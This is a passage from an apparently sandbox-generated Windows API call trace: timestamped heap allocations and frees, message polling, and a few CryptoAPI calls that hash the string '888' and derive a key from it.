hHeap=0x970000) returned 1 [0268.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0268.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0268.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e38 [0268.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0268.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0268.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55048, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.593] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0268.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51bc8 [0268.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51bc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0268.594] CryptHashData (hHash=0xa87610, pbData=0x2e550e8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0268.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.595] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.595] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.603] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.603] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0268.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.604] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51e50 [0268.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51e50, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0268.604] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87610, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa872d0) returned 1 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x970000) returned 1 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0268.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0268.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0268.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0268.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0268.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0268.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.608] PeekMessageW (in: lpMsg=0x8cf3b8, 